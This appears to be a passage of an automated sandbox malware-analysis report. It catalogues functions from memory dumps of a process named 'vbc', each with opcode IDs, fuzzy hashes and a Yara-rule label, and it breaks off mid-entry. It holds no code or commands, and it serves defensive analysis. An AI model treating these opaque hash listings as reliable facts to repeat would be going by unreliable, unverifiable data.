                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9000ff07a74e0de7a4784fbf4a0591aa0266f1656afb61f3e8ee9e2e62f56747
                                                                                                                                                                                            • Instruction ID: e2af8ba5da8fa253b0bc742c9f815dc804f8d2fa6255b5f4153000fb34381fa0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9000ff07a74e0de7a4784fbf4a0591aa0266f1656afb61f3e8ee9e2e62f56747
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2421F171504244DFDB15DF10D9C5F26BFA6FB88368F248569F8094B606C336D85AC6E1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 05A3D654 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.418409526.0000000005A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A3D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_5a3d000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: af477bfd8c130c3ad725138582d7450f11f192c4874afec1cb7c158e8e0eeee2
                                                                                                                                                                                            • Instruction ID: cf17dace3898d32f22d134037c1fc814a7e930da2f4f7c05c4319cd318539d14
                                                                                                                                                                                            • Opcode Fuzzy Hash: af477bfd8c130c3ad725138582d7450f11f192c4874afec1cb7c158e8e0eeee2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E2103B5504244DFCB05CF10D9C5F26BF76FB88368F2489A9F8090B646C336D856CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736C5D0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 165644bf348560ef00c0bf9dab86881f01b0ba31bd14f615266b81becbc542c4
                                                                                                                                                                                            • Instruction ID: f6f067e4090af4bd78cf9ad6fefb29f69721762938117b19b4a6ad9b97c05931
                                                                                                                                                                                            • Opcode Fuzzy Hash: 165644bf348560ef00c0bf9dab86881f01b0ba31bd14f615266b81becbc542c4
                                                                                                                                                                                            • Instruction Fuzzy Hash: D421C9F03092918BE71D6B31B12DB7A3AAA9B41741F48A03DD48BC768BDF259C41C776
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0A00F0D0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c9fe960f9318e78416e142e8784bc0b6341f6211bb6ce4ef2797099ad6480f3a
                                                                                                                                                                                            • Instruction ID: 65fc716fbef2fbfafc709346c08310815953bd9e60c4dc696ee2c0b77fe724d5
                                                                                                                                                                                            • Opcode Fuzzy Hash: c9fe960f9318e78416e142e8784bc0b6341f6211bb6ce4ef2797099ad6480f3a
                                                                                                                                                                                            • Instruction Fuzzy Hash: B911263670134A5FCB159B78A4888BE7BEBEBCA2653044479E559C7742DE318C46CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736CE98 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 842d11081075f105197c765b892134c4b7b12b422d5c5b4e18c6dc9baf5e33dc
                                                                                                                                                                                            • Instruction ID: 0699093e4ad5512d909cb244a0771a56986365bc2cbc51a6343861d7d5083768
                                                                                                                                                                                            • Opcode Fuzzy Hash: 842d11081075f105197c765b892134c4b7b12b422d5c5b4e18c6dc9baf5e33dc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F11813070060E9BCB00EF28D58899EB3B7FF85249B104D2AE0155BB51DF70BD4A87E1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 05A3D14B Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.418409526.0000000005A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A3D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_5a3d000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ca188c22fcea21636a6e976a3677c84dfa41646da86b851ee222b7e3cf0e15c5
                                                                                                                                                                                            • Instruction ID: 776e780aff6f00f8b9e43441ca9ddcbaac13d5a3e542b8c69ba2cf387dad1b0c
                                                                                                                                                                                            • Opcode Fuzzy Hash: ca188c22fcea21636a6e976a3677c84dfa41646da86b851ee222b7e3cf0e15c5
                                                                                                                                                                                            • Instruction Fuzzy Hash: D2219D76504280DFCF06CF50D9C5F16BF72FB88314F2886A9E9480A61AC33AD466DBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361BC8 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 04521fdf19f5ab42a9bf019c6fe5a2a570853b4478efd73bf70f02d3f3d25138
                                                                                                                                                                                            • Instruction ID: 8fe21782db5e71268c181e5c42ea7c3d5adc76caac180fa133a7bdbd3b4e2276
                                                                                                                                                                                            • Opcode Fuzzy Hash: 04521fdf19f5ab42a9bf019c6fe5a2a570853b4478efd73bf70f02d3f3d25138
                                                                                                                                                                                            • Instruction Fuzzy Hash: C621F2B5E0121CDFDB04CFA9E898ADDBBBABB88310F10912AE805B3350DB741911CF54
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 05A3D73B Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.418409526.0000000005A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A3D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_5a3d000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f85ffd686ffd7de9872e7b0a9d7a88b2d511b4c8bcdc15a26d72bea6395e8e37
                                                                                                                                                                                            • Instruction ID: 560f1ac0dfaba1da2716d6e8a8581277e28242b94b2cb1d3d748224ba1b5ff27
                                                                                                                                                                                            • Opcode Fuzzy Hash: f85ffd686ffd7de9872e7b0a9d7a88b2d511b4c8bcdc15a26d72bea6395e8e37
                                                                                                                                                                                            • Instruction Fuzzy Hash: 02119376904280DFCB16CF10D5C5F16BF72FB84324F28C6A9E8054B656C336D45ACBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 05A3D64F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.418409526.0000000005A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A3D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_5a3d000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f85ffd686ffd7de9872e7b0a9d7a88b2d511b4c8bcdc15a26d72bea6395e8e37
                                                                                                                                                                                            • Instruction ID: 4fa2486e03743a783ec0c6779165f69637a021851fa6bf9b6c35313e8942e439
                                                                                                                                                                                            • Opcode Fuzzy Hash: f85ffd686ffd7de9872e7b0a9d7a88b2d511b4c8bcdc15a26d72bea6395e8e37
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F11D376504280CFCB12CF10D9C4F16BF72FB84324F24C6A9E8494B656C336D456CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 073662A0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ba4c226eeb18f636ab5035ca6b3c3243a22b835d2d152715c49e49d8ba4bd6f0
                                                                                                                                                                                            • Instruction ID: d3946f7b8cf5be01a6dc28d72a1d91a09fa385d14227d8599dea6f03aaefa8b0
                                                                                                                                                                                            • Opcode Fuzzy Hash: ba4c226eeb18f636ab5035ca6b3c3243a22b835d2d152715c49e49d8ba4bd6f0
                                                                                                                                                                                            • Instruction Fuzzy Hash: A211FE3120060E8BCB60DF29D5C88CFB3E7AF842197108E29E4594BB64EB70BD5E87D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736DE58 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 77b381476ccd05eb749d958184ade435833a10829d05f740e4455288b92c20d1
                                                                                                                                                                                            • Instruction ID: c6cccdca757a79a81e02686f6c70c979b93ce3c19e4b177c545ce10fcde2b0db
                                                                                                                                                                                            • Opcode Fuzzy Hash: 77b381476ccd05eb749d958184ade435833a10829d05f740e4455288b92c20d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6411A3307023449FCB155B34A44CA2AB7A7EBC6209F14482DE60687740DFB1EC0AC792
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0A00F558 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bfeb9ae553ded9c0577c87f20b5d407618146a3d1371c5db907a5eabbcc68130
                                                                                                                                                                                            • Instruction ID: 939015164575c2e304bf942d572d7ebecd8d1db7eb2460ce07465f6957ff2d34
                                                                                                                                                                                            • Opcode Fuzzy Hash: bfeb9ae553ded9c0577c87f20b5d407618146a3d1371c5db907a5eabbcc68130
                                                                                                                                                                                            • Instruction Fuzzy Hash: A1115731200209EFE725CF65D444A6A7BE1FF85352F018029F95ACF290CB72E840CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9C0D0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c7fb3e3e78027eefa5a8fb39840930802fbf3aa996bd34426349fbe0d988d50b
                                                                                                                                                                                            • Instruction ID: 820b73b886b23bcd320beea2efdef0739ff417dc78dc21deed373b0755cd462d
                                                                                                                                                                                            • Opcode Fuzzy Hash: c7fb3e3e78027eefa5a8fb39840930802fbf3aa996bd34426349fbe0d988d50b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 80114574E002198FCF04DBA8D8216EEBBB1EF89300F00816AD115AB391DB395915CF91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07364ACD Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 533e8c772580aa2379f417ae3b65ea187d94328fd766ef7a58bade48059f0336
                                                                                                                                                                                            • Instruction ID: dbbcfb4863d9d4f2c0d2299eef3ddfecf2c28365fb134be0d9b3df9141f32c12
                                                                                                                                                                                            • Opcode Fuzzy Hash: 533e8c772580aa2379f417ae3b65ea187d94328fd766ef7a58bade48059f0336
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3711A0312056454F8B44A730A69C86E3BA3EFC21193594979E106CBB82DE247D0B87A6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736DE60 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c7b6ccda044969c94350e74cc7bf61d1b57c3dd7cc3d4501b1af493033572e4f
                                                                                                                                                                                            • Instruction ID: 4df2ff57f4ade7cc9bdb40b91523f98b996342e10aedc27df42b63c4c1ade8dc
                                                                                                                                                                                            • Opcode Fuzzy Hash: c7b6ccda044969c94350e74cc7bf61d1b57c3dd7cc3d4501b1af493033572e4f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 09018E303023448FCB159A35A58CA2AB7A7EBC620AF14483DE60687780CFB5EC068791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736CE88 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 95884554ce09f950bd15f1b77cef2390e3a6f36303b52c0d6cd4bef958def56d
                                                                                                                                                                                            • Instruction ID: 4d62c633f8a0c99ffc469deed26f806787a432d058d19f8ab4103b931e1ca16b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 95884554ce09f950bd15f1b77cef2390e3a6f36303b52c0d6cd4bef958def56d
                                                                                                                                                                                            • Instruction Fuzzy Hash: B101283060031A9FCB10DF38D89889EBBB2FF82215B104E6BD0554F751DB70694AC7E1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07364AE0 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f2df3a2846e1a5dc29a5a51ab78def9f382ea37e3db19bc46c61270fa9d1b777
                                                                                                                                                                                            • Instruction ID: 26a73c90d5f25ce560c8d5ece8a76304ae68619b62ee7178f5c790d1c0f3a36e
                                                                                                                                                                                            • Opcode Fuzzy Hash: f2df3a2846e1a5dc29a5a51ab78def9f382ea37e3db19bc46c61270fa9d1b777
                                                                                                                                                                                            • Instruction Fuzzy Hash: BD015E353015094F8B88A734E69CC6F36A7EFC52193954D39E106CBB81DE747D0A87E9
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736D5D0 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 73f8824f44d73037a22649e2e93d0d4750f004a054a448f56b724c45083359d4
                                                                                                                                                                                            • Instruction ID: 755a59f76bebd6e096f1931af0d4b84f18f4a4ed18175517b824a0f7a5354388
                                                                                                                                                                                            • Opcode Fuzzy Hash: 73f8824f44d73037a22649e2e93d0d4750f004a054a448f56b724c45083359d4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A014C342006458FCB15CB39E588899BBB2BF8520475584AAE845CBB72DB71ED06CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 05A3D041 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.418409526.0000000005A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A3D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_5a3d000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d1f166837187bbc2fd595d206c208186fafd5d19be40a6df2d493855fda16348
                                                                                                                                                                                            • Instruction ID: c9a3a772c950cacf057af06c3d97b85551aaafc58a4eebb3130ebc6dfe110c45
                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f166837187bbc2fd595d206c208186fafd5d19be40a6df2d493855fda16348
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E01D431508384DAD7208B21CD85F66BBA8FF426A8F48859AFD1A1F746C375D849C6B2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9CA08 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 983bacb55c4373023cba31c4ecd49f69c8a21596a3ba37bc8932d3d12d77b67a
                                                                                                                                                                                            • Instruction ID: a155f149c896f260cd36b3566ffc9bfc744269d4dce3ec6e4a6d937b77bc3676
                                                                                                                                                                                            • Opcode Fuzzy Hash: 983bacb55c4373023cba31c4ecd49f69c8a21596a3ba37bc8932d3d12d77b67a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 54018F309261C98FCF04CFB8D4956AD7FB4EF06205F1841EAD8859B316DB314E55DB81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9DDA9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 64ee3f0f461307016d34b0d9c438f8cdcf6fc9f6c115397004eadb4db5d2626d
                                                                                                                                                                                            • Instruction ID: 931479b940da616f09499e38c23d268d19d7dd4ddeb9f3ab502cc16f2a2dcd88
                                                                                                                                                                                            • Opcode Fuzzy Hash: 64ee3f0f461307016d34b0d9c438f8cdcf6fc9f6c115397004eadb4db5d2626d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 24015639E052988BDF15CFB9E4146DDBFF8AF8E310F1490AAE404B7252C7355914CB64
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9C0E0 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 20badade1623522480b440471605e085cfa773101a83f5a3678a17522a531edf
                                                                                                                                                                                            • Instruction ID: 38442ccb492adf06a205dc29a459d4190190b19f01e9d5c138e51d7861c92bf9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 20badade1623522480b440471605e085cfa773101a83f5a3678a17522a531edf
                                                                                                                                                                                            • Instruction Fuzzy Hash: DE011374E0021D8FCF04DBA8D855AEEBBB5EB88304F00852AD115A7384DB3999158BD1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9FF3A Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 60174c88907f22533660f8fd68f8949ecfa394d111c1d6aa231bd4d669d5d1e9
                                                                                                                                                                                            • Instruction ID: 6a689229ece6f73c4fe43f3a02ec1e00fef27769a25c5f4c163a318e24262dad
                                                                                                                                                                                            • Opcode Fuzzy Hash: 60174c88907f22533660f8fd68f8949ecfa394d111c1d6aa231bd4d669d5d1e9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59017835E082588BDF08CFA9E4146DDBFF9AB8A315F1491AAE444B3342CB354805CBA4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736CD58 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 0183a7f22b11360d605530c6307bad8c3ab0cfaa27213253ed3c47fff5e69c31
                                                                                                                                                                                            • Instruction ID: e6cac56dc5ac8ccfed0257304bfd525afb91064d375522a600a9a78ce8a88ee5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0183a7f22b11360d605530c6307bad8c3ab0cfaa27213253ed3c47fff5e69c31
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2018BB1A01219DFCB58DF68D4485EEBBF1FF89320F00452AD44ADB600DB302A46CF91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736E987 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a4b714d340cafa6e0a2be3b3dc38cc32b6fb8de8116b0eb3636154e74c9cd8f7
